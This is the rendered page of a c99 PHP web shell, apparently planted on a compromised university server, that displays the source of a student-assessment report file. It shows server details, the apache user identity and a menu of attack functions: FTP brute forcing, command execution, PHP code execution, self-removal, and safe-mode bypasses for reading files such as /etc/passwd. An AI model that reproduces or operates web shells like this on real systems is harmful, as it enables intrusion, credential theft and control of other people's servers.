!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     esa_headReport.php (3.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
echo "defindId = ".$defineid;
echo "pjid = ".$pjid;
*/

    
include_once "../class/clsEsa_Member.php";
    
$oMb = new SaMember();
    include_once 
"../class/clsEsa_DoProject.php";
    
$oDpj = new DoProject();
    include_once 
"../class/clsEsa_DetailProject.php";
    
$oDtpj = new SaDetailProject();

    
$numAllCourseReg=0;
    
$oMb->RSByPj($pjid);
    
$numAllCourseReg $oMb->numRows;
    
$numAllDo=$numAllCourseReg;

    
$numDoAss 0;
    
$oDpj->RSByDefinePj($defineid,$pjid);
    
$numDoAss $oDpj->numRows;

    
$oDtpj->SearchByKey($pjid);
    
$oDtpj->GetRecord();
?>
<table width="100%" border="0" align="center">
    <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>">
      <td><font size="2"><b><img src="../picture/bullet.gif"> 
        ชื่อแบบประเมิน </b></font></td>
      <td colspan="3"><font size="2"><b>: </b> 
        <? if($oAF->maintopic == ""){ echo "-"; }else{ echo $oAF->maintopic; } ?>
        </font></td>
    </tr>
<!-- <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
      <td><font size="2"><b><img src="../picture/bullet.gif"> 
        ชื่อทั่วไปแบบประเมิน</b></font></td>
      <td colspan="3"><font size="2"><b>: </b><? echo $oAF->nameAss ?></font></td>
    </tr> -->
    <tr> 
      <td width="164"><font size="2"><b><img src="../picture/bullet.gif"> 
        ปีการศึกษา</b></font></td>
      <td colspan="3"><font size="2"><b>: </b></font><? echo $acadYear ?> 
        / <? echo $oSse->semesterName;?></td>
    </tr>

    <tr> 
      <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
        ช่วงเวลาประเมิน</b></font></td>
      <td colspan="2"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo abbreDate(splitDateDb2($oDA->startDate,'/')); ?> 
        - <? echo abbreDate(splitDateDb2($oDA->endDate,'/'));  ?></font></td>
    </tr>     
    <tr> 
        <td height="22" colspan="1"><font size="2"><b><img src="../picture/bullet.gif"> 
       ประเมินโครงการ</b></font></td>
        <? $numAllDo=$numAllCourseReg?>
            <td height="22" colspan="2"><font size="2"> : 
        <?php echo $oDtpj->dpj_sub_name?>
        </font></td>
    </tr>
    <tr>
      <td height="22" colspan="1"><font size="2"><b><img src="../picture/bullet.gif"> 
        นักศึกษาที่เข้าร่วมโครงการ</b></font></td>
      <td height="22" colspan="1"><font size="2"> : 
        <?php echo $numAllDo?><b>   คน</b>
        </font></td>
    </tr>

    <tr> 
        <td height="22" colspan="1"><font size="2"><b><img src="../picture/bullet.gif"> 
       นักศึกษาที่เข้าประเมิน</b></font></td>
        <? $numAllDo=$numAllCourseReg?>
      <td height="22" colspan="1"><font size="2"> : 
        <?php echo $numDoAss?><b>   คน</b>
        </font></td>
      <td height="22" colspan="1"><font size="2"><b><img src="../picture/bullet.gif"> 
        ร้อยละเฉลี่ยการเข้ามาประเมิน : </b></font><font size="2"> 
        <? $percentDo = ($numDoAss/$numAllDo)*100;  printf ("%.2f",$percentDo);?>
        </font></td>
    </tr>

    <tr><td colspan="4">&nbsp;</td></tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--